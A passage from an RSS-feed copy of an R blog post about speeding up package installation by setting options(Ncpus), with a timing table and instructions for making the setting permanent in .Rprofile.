&lt;td&gt;1&lt;/td&gt;
&lt;td&gt;409&lt;/td&gt;
&lt;td&gt;2.26&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;224&lt;/td&gt;
&lt;td&gt;1.24&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;4&lt;/td&gt;
&lt;td&gt;196&lt;/td&gt;
&lt;td&gt;1.08&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;6&lt;/td&gt;
&lt;td&gt;181&lt;/td&gt;
&lt;td&gt;1.00&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;So setting &lt;code&gt;Ncpus&lt;/code&gt; to 2 allows us to half the installation time from 409 seconds to around 224 (seconds). Increasing &lt;code&gt;Ncpus&lt;/code&gt; to 4 gives a further speed boost. Due to the dependencies between packages, we’ll never achieve a perfect speed-up, e.g. if package {X} depends on {Y}, then we have to install {X} first. However, for a simple change we get an easy speed boost.&lt;/p&gt;
&lt;p&gt;Furthermore, setting &lt;code&gt;Ncpus&lt;/code&gt; gives a speed boost when updating packages via &lt;code&gt;update.packages()&lt;/code&gt;.&lt;/p&gt;
&lt;h3 id="a-permanent-change-rprofile"&gt;A permanent change: &lt;code&gt;.Rprofile&lt;/code&gt;&lt;/h3&gt;
&lt;p&gt;Clearly writing &lt;code&gt;options(Ncpus = 6)&lt;/code&gt; before you install a package is a pain. However, you can just add it to your &lt;code&gt;.Rprofile&lt;/code&gt; file. In a future blog post, we cover the &lt;code&gt;.Rprofile&lt;/code&gt; in more detail, but for the purposes of this post, your &lt;code&gt;.Rprofile&lt;/code&gt; is a file that contains R code that runs whenever R starts. You can test whether you have an &lt;code&gt;.Rprofile&lt;/code&gt; file using the command&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;file.exists&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;~/.Rprofile&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;If you don’t have an &lt;code&gt;.Rprofile&lt;/code&gt; file, create one in your home area&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;Sys.getenv&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;HOME&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Then simply add &lt;code&gt;options(Ncpus = XX)&lt;/code&gt; to your file.&lt;/p&gt;
&lt;p&gt;The one remaining question is what value should you set &lt;code&gt;XX&lt;/code&gt;. I typically set it to six since I have eight cores. This allows packages to be installed in parallel, while giving me a little bit of wiggle room to check email and listen to music.&lt;/p&gt;
&lt;h3 id="references"&gt;References&lt;/h3&gt;
&lt;p&gt;If you are interested in how CRAN handles the phenomenal number of package submissions, check out this recent talk:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://channel9.msdn.com/Events/useR-international-R-User-conferences/useR-International-R-User-2017-Conference/KEYNOTE-20-years-of-CRAN" rel="external"&gt;Twenty years of CRAN&lt;/a&gt; by Uwe Ligges at UseR2017! in Brussels.&lt;/li&gt;
&lt;li&gt;Image credit: &lt;a href="https://unsplash.com/photos/-3wygakaeQc" rel="external"&gt;Simson Petrol&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/speeding-up-package-installation/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item></channel></rss>